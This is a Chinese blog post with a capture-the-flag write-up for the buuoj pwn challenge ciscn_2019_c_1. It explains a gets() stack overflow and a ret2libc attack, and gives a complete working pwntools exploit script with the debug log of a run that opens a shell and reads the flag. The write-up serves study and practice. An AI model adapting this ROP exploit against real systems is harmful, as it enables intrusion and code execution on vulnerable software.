CTF buuoj pwn-----第7题:ciscn_2019_c_1

最新推荐文章于 2022-10-30 17:46:59 发布
最新推荐文章于 2022-10-30 17:46:59 发布
阅读量624 收藏 3
点赞数 2
分类专栏: PWN 文章标签: pwn 安全漏洞 反汇编 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bing_Max/article/details/120429210
版权

CTF buuoj pwn-----第7题:ciscn_2019_c_1

前言

重新梳理记录一下这道题的解题过程.

1.checksec

还是先看一下保护:

bing@bing-virtual-machine:~/pwn$ checksec ./ciscn_2019_c_1
[*] '/home/bing/pwn/ciscn_2019_c_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

只有开启了栈不可以执行.
这就只能调用系统自身函数 或者 libc函数了
随手运行一下:

pwndbg> r
Starting program: /home/bing/pwn/ciscn_2019_c_1 

EEEEEEE                            hh      iii                
EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  
EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e 
EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  
EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee 
====================================================================
Welcome to this Encryption machine

====================================================================
1.Encrypt
2.Decrypt
3.Exit
Input your choice!

2. IDA 静态分析

查看整个文件, 没有找到后门函数
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

幸运的是,我们在int encrypt()函数里面第10行找到了gets函数, 明显存在栈溢出.

3. 解题思路

  • eelf文件中没有system函数, 这就要用ret2libc方法 来调用libc中的system(‘bin/sh’) 函数.
  • 从11行到33行是encrypt函数的加密过程,它会对我们输入的字符串进行操作,为了保证我们构造的rop不会被破坏,要想办法绕过加密,14行的if判断里有个strlen函数,strlen的作用是得知字符串的长度,但是遇到’\0‘就会停止,所以我们在构造rop的时候可以在字符串前加上’\0‘来绕过加密.
  • 怎么获取lib.c的基地址 ?
    encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址,本题我选用了__libc_start_main函数泄露libc的基地址其实都一样
  • 构造payload:
    • payload_1 :
      在这里插入图片描述
    • payload_2 (右侧):
      在这里插入图片描述

4. 编写EXP

from pwn import *

from LibcSearcher import *


context(os='linux', arch='amd64', log_level='debug')

sh = remote('node4.buuoj.cn', 25077)  

elf=ELF('./ciscn_2019_c_1') 


pop_rid_addr = 0x400c83  

ret_addr = 0x4006b9

# 通过ROPgadget 找到


__libc_start_main_addr_got = elf.got['__libc_start_main']

puts_addr_plt = elf.plt['puts']

main_addr = elf.sym['main']


payload_1 = b'\0'+b'a'*(0x50-1+8) + p64(pop_rid_addr)+ p64(__libc_start_main_addr_got)+ p64(puts_addr_plt)+ p64(main_addr)


sh.recvuntil(b'choice!\n')

sh.sendline(b'1')

sh.recvuntil(b'encrypted\n')

sh.sendline(payload_1)



sh.recvuntil(b'Ciphertext\n')

sh.recvuntil(b'\n')   

# 这一行就收到了我们想要的地址:_libc_start_main_address

__libc_start_main_address = u64(sh.recvuntil(b'\n')[:-1].ljust(8,b'\x00'))

print(hex(__libc_start_main_address))


# ******* ********以上获得了_libc_start_main函数的实际地址

libc=LibcSearcher('__libc_start_main', __libc_start_main_address)



libc_base_addr = __libc_start_main_address - libc.dump('__libc_start_main')

binsh_addr = libc_base_addr + libc.dump('str_bin_sh')

system_addr = libc_base_addr + libc.dump('system')




payload_2 = b'\0'+b'a'*(0x50-1+8)  + p64(ret_addr) +p64(pop_rid_addr)+ p64(binsh_addr) + p64(system_addr)



sh.recvuntil(b'choice!\n')

sh.sendline(b'1')

sh.recvuntil(b'encrypted\n')

sh.sendline(payload_2)



sh.interactive()



#  0x7f6117b5eab0   0x7eff82295ab0   0x7fbd33daeab0  
这里随手记录了三次运行后打印出来得到的不同 _libc_start_main_address 
后三位 ab0 固定不变,可以在线查询到libc database   https://libc.blukat.me/?q=__libc_start_main%3Aab0

在这里插入图片描述

5. 运行EXP, 获取flag

debug模式,可以清晰的看到每一条exp指令的作用.
本exp运行时没有任何警告错误.

bing@bing-virtual-machine:~/pwn$ python3 ciscn_2019_c_1.py 
[+] Opening connection to node4.buuoj.cn on port 25077: Done
[*] '/home/bing/pwn/ciscn_2019_c_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[DEBUG] Received 0x217 bytes:
    b'EEEEEEE                            hh      iii                \n'
    b'EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  \n'
    b'EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e \n'
    b'EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  \n'
    b'EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee \n'
    b'====================================================================\n'
    b'Welcome to this Encryption machine\n'
    b'\n'
    b'====================================================================\n'
    b'1.Encrypt\n'
    b'2.Decrypt\n'
    b'3.Exit\n'
    b'Input your choice!\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x25 bytes:
    b'Input your Plaintext to be encrypted\n'
[DEBUG] Sent 0x79 bytes:
    00000000  00 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │·aaa│aaaa│aaaa│aaaa│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000050  61 61 61 61  61 61 61 61  83 0c 40 00  00 00 00 00  │aaaa│aaaa│··@·│····│
    00000060  38 20 60 00  00 00 00 00  e0 06 40 00  00 00 00 008 `·│····│··@·│····│
    00000070  28 0b 40 00  00 00 00 00  0a(·@·│····│·│
    00000079
[DEBUG] Received 0x22a bytes:
    00000000  43 69 70 68  65 72 74 65  78 74 0a 0a  b0 3a 8e 7a  │Ciph│erte│xt··│·:·z│
    00000010  d2 7f 0a 45  45 45 45 45  45 45 20 20  20 20 20 20  │···E│EEEE│EE  │    │
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    00000030  20 20 20 20  20 20 68 68  20 20 20 20  20 20 69 69  │    │  hh│    │  ii│
    00000040  69 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │i   │    │    │    │
    00000050  20 0a 45 45  20 20 20 20  20 20 6d 6d  20 6d 6d 20  │ ·EE│    │  mm│ mm │
    00000060  6d 6d 6d 6d  20 20 20 20  61 61 20 61  61 20 20 20  │mmmm│    │aa a│a   │
    00000070  63 63 63 63  20 68 68 20  20 20 20 20  20 20 20 20  │cccc│ hh │    │    │
    00000080  20 6e 6e 20  6e 6e 6e 20  20 20 20 65  65 65 20 20  │ nn │nnn │   e│ee  │
    00000090  0a 45 45 45  45 45 20 20  20 6d 6d 6d  20 20 6d 6d  │·EEE│EE  │ mmm│  mm│
    000000a0  20 20 6d 6d  20 20 61 61  20 61 61 61  20 63 63 20  │  mm│  aa│ aaa│ cc │
    000000b0  20 20 20 20  68 68 68 68  68 68 20 20  69 69 69 20  │    │hhhh│hh  │iii │
    000000c0  6e 6e 6e 20  20 6e 6e 20  65 65 20 20  20 65 20 0a  │nnn │ nn │ee  │ e ·│
    000000d0  45 45 20 20  20 20 20 20  6d 6d 6d 20  20 6d 6d 20  │EE  │    │mmm │ mm │
    000000e0  20 6d 6d 20  61 61 20 20  61 61 61 20  63 63 20 20  │ mm │aa  │aaa │cc  │
    000000f0  20 20 20 68  68 20 20 20  68 68 20 69  69 69 20 6e  │   h│h   │hh i│ii n│
    00000100  6e 20 20 20  6e 6e 20 65  65 65 65 65  20 20 0a 45  │n   │nn e│eeee│  ·E│
    00000110  45 45 45 45  45 45 20 6d  6d 6d 20 20  6d 6d 20 20  │EEEE│EE m│mm  │mm  │
    00000120  6d 6d 20 20  61 61 61 20  61 61 20 20  63 63 63 63  │mm  │aaa │aa  │cccc│
    00000130  63 20 68 68  20 20 20 68  68 20 69 69  69 20 6e 6e  │c hh│   h│h ii│i nn│
    00000140  20 20 20 6e  6e 20 20 65  65 65 65 65  20 0a 3d 3d  │   n│n  e│eeee│ ·==00000150  3d 3d 3d 3d  3d 3d 3d 3d  3d 3d 3d 3d  3d 3d 3d 3d================*
    00000190  3d 3d 0a 57  65 6c 63 6f  6d 65 20 74  6f 20 74 68==·W│elco│me t│o th│
    000001a0  69 73 20 45  6e 63 72 79  70 74 69 6f  6e 20 6d 61is E│ncry│ptio│n ma│
    000001b0  63 68 69 6e  65 0a 0a 3d  3d 3d 3d 3d  3d 3d 3d 3d  │chin│e··=========000001c0  3d 3d 3d 3d  3d 3d 3d 3d  3d 3d 3d 3d  3d 3d 3d 3d================*
    000001f0  3d 3d 3d 3d  3d 3d 3d 3d  3d 3d 3d 0a  31 2e 45 6e===========·│1.En│
    00000200  63 72 79 70  74 0a 32 2e  44 65 63 72  79 70 74 0a  │cryp│t·2.│Decr│ypt·│
    00000210  33 2e 45 78  69 74 0a 49  6e 70 75 74  20 79 6f 753.Ex│it·I│nput│ you│
    00000220  72 20 63 68  6f 69 63 65  21 0a                     │r ch│oice│!·│
0x7fd27a8e3ab0
[+] http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6_2.27-3ubuntu1_amd64.deb (id libc6_2.27-3ubuntu1_amd64) be choosed.
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x25 bytes:
    b'Input your Plaintext to be encrypted\n'
[DEBUG] Sent 0x79 bytes:
    00000000  00 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │·aaa│aaaa│aaaa│aaaa│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000050  61 61 61 61  61 61 61 61  b9 06 40 00  00 00 00 00  │aaaa│aaaa│··@·│····│
    00000060  83 0c 40 00  00 00 00 00  9a 5e a7 7a  d2 7f 00 00  │··@·│····│·^·z│····│
    00000070  40 14 91 7a  d2 7f 00 00  0a                        │@··z│····│·│
    00000079
[*] Switching to interactive mode
[DEBUG] Received 0xc bytes:
    b'Ciphertext\n'
    b'\n'
Ciphertext

$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2b bytes:
    b'flag{b50cca6a-ceae-4344-ae38-63b797141aef}\n'
flag{b50cca6a-ceae-4344-ae38-63b797141aef}

flag{b50cca6a-ceae-4344-ae38-63b797141aef}

后记

  • 为什么通过__libc_start_main或者gets函数泄露libc地址, plt got延时绑定技术等, 都是听过解本题有了更加深刻的认识, 网上也有较多教程. 改天也写一篇这方面的学习.
  • 这张表有挺多信息的.

在这里插入图片描述

Hex_bing
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。解链接:https://blog.csdn.net/A951860555/article/details/111991072
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
【标】"i-SOON_CTF_2019:2019第二届安洵杯过渡环境"指的是2019年举办的第二届安洵杯网络安全竞赛中的一个环节,这个环节涉及到了过渡环境的设置与使用。CTF(Capture The Flag)是网络安全领域常见的竞赛形式,...
buuoj [第六章 CTFPWN章]fsb
yongbaoii的博客
01-30 1784
非栈上的格式化字符串漏洞 + 劫持GOT表 瞅瞅检查 开了NX、canary跟PIE。 RELRO没有开,可以考虑劫持GOT表。 进去是个循环 里面是个格式化字符串漏洞。 因为它开的空间是堆上的,所以常规栈上的格式化字符串漏洞不能用。 非栈上的格式化字符串漏洞 非栈上的格式化字符串漏洞的话,先在printf处下断点。 总体思路 满足利用要求的三个指针分别在printf第10、16、20个参数的位置。该程序在循环执行20次输入、输出前申请了一个内存块,用于存放输入的字符串,循环结束后会释放掉这个内存
CTF buuoj pwn-----第3:warmup_csaw_2016
bing_Max的博客
08-29 1696
CTF buuoj pwn-----第3:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2107
经典栈溢出漏洞。
buuoj [第六章 CTFPWN章]ROP
yongbaoii的博客
01-28 1003
ret2libc 保护。 啥没有。 直接就溢出了,但是没后门函数,就通过puts函数泄露puts函数地址,计算libc基地址,找到system函数与’/bin/sh’, 然后一把梭就好。 需要用到gadget。 exp
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
ctfctf-pwn收集
最新发布
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
BUUCTF PWN-----第1:test_your_nc
热门推荐
bing_Max的博客
08-27 1万+
buuoj-----第四:ciscn_2019_n_1 前言 简单记录一下pwn的过程 首先checkesc ,检测文件的保护机制. 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
CTF buuoj pwn-----第9:jarvisoj_level2
bing_Max的博客
09-27 763
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
CTF领域指南
Terminal Cloud
06-26 6818
原文:https://trailofbits.github.io/ctf/ 翻译:做个好人 译者声明:本文翻译自美国trailofbits团队发布在Github上的《CTF Field Guide》手册,我们已与对方联系获得翻译授权,由于手册内容尚在更新过程中,故有部分缺失。如有翻译不当之处,请与我们联系更正:@IDF实验室。 “Knowing is not enough;
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 409
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
ciscn_2019_c_1
weixin_56301399的博客
07-21 1522
ret2libc来泄露libc基址
ciscn_2019_c_1(ret2libc)
qq_53928256的博客
10-08 765
综上,我们可以构造第一段payload为(payload首部加入‘\0’是为了绕过encrypt函数,防止输入的字符串加密而变化,strlen()函数遇‘\0’截止)故我们可以计算加载程序的基址,通过基址和各个函数以及字符串的偏移量可以计算各个函数以及字符串在程序中的地址。通过已经调用过的函数去泄露它在程序中的地址,然后利用地址末尾的3个字节,去找到该程序所用的libc版本;随后我们可以通过得到的libc版本来查询对应字符串或函数的偏移地址,也包括puts函数的偏移地址;
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 776
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
CTF buuoj pwn-----第4:ciscn_2019_n_1
bing_Max的博客
08-29 543
CTF buuoj pwn-----第4:ciscn_2019_n_1前言一. checkesc ,检测文件的保护机制二. 静态分析,IDA打开文件 前言 记录一下pwn的过程 同第1、2、3一样,新手学习日记,流水线记录. 打开目, 连接靶机,下载文件ciscn_2019_n_1 一. checkesc ,检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ciscn_2019_n_1 [*] '/home/bing/pwn/cisc
看雪CTF2019Q2-第8:迷雾中的琴声解解析
"看雪CTF2019Q2-第8思路——迷雾中的琴声1,这是一道关于安全的CrackMe目,涉及到密码学、二进制逆向工程和多线程计算。目要求通过解密算法得到正确的密钥,算法包括对字符串进行十六进制到二进制转换、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值